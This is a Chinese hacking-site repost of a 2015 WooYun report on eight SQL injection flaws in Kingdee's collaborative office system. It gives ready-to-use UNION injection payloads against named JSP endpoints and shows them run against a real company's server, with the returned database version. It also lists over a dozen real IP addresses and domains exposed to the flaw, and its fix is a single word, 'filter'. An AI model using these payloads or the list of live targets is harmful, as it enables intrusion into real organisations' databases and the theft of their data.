记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

金蝶协作办公系统存在八个高危SQL注射

2015-11-24 12:40

存在漏洞的文件为,均可union直接出数据:

code 区域
/kingdee/tree/tree/announce/get_nodes.jsp?node=1

/kingdee/tree/tree/announce/get_selected.jsp?ids=1

/kingdee/tree/tree/discuss/get_nodes.jsp?node=1

/kingdee/tree/tree/discuss/get_selected.jsp?ids=1

/kingdee/tree/tree/news/get_nodes.jsp?node=1

/kingdee/tree/tree/news/get_selected.jsp?ids=1

/kingdee/tree/tree/rules/get_nodes.jsp?node=1

/kingdee/tree/tree/rules/get_selected.jsp?ids=1



漏洞poc

code 区域
/get_nodes.jsp?node=1 union select NULL,@@version--

/get_selected.jsp?ids=1) union select NULL,@@version--



案例非常多,选一个进行证明

get_nodes.jsp

code 区域
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_nodes.jsp?node=1%20union%20select%20NULL,@@version--

[{"id":"","text":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n","announce":"","leaf":false,"node_type":"0","announce_name":"Microsoft SQL Server 2005 - 9.00.4035.00 (X64) \n\tNov 24 2008 16:17:31 \n\tCopyright (c) 1988-2005 Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)\n"},]



get_selected.jsp

code 区域
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_selected.jsp?ids=1) union select NULL,@@version--

[[,'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) '],[1,'公司公告']]



给出几个案例:

code 区域
http://221.226.149.17:8080/kingdee/login/loginpage.jsp

http://122.139.60.103:800/kingdee/login/loginpage.jsp

http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp

http://222.179.238.182:8082/kingdee/login/loginpage2.jsp

http://222.134.77.23:8080/kingdee/login/loginpage.jsp

http://221.4.245.218:8080/kingdee/login/loginpage.jsp

http://221.226.149.17:8080/kingdee/login/loginpage.jsp

http://220.189.244.202:8080/kingdee/login/loginpage.jsp

http://222.133.44.10:8080/kingdee/login/loginpage.jsp

http://223.95.183.6:8080/kingdee/login/loginpage.jsp

http://61.190.20.51/kingdee/login/loginpage.jsp

http://60.194.110.187/kingdee/login/loginpage.jsp

http://oa.roen.cn/kingdee/login/loginpage.jsp

漏洞证明:

code 区域
http://oa.guanhao.com:8080/kingdee/tree/tree/announce/get_selected.jsp?ids=1) union select NULL,@@version--

[[,'Microsoft SQL Server 2005 - 9.00.4035.00 (X64) Nov 24 2008 16:17:31 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) '],[1,'公司公告']]

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0136918

阅读:72370 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“金蝶协作办公系统存在八个高危SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云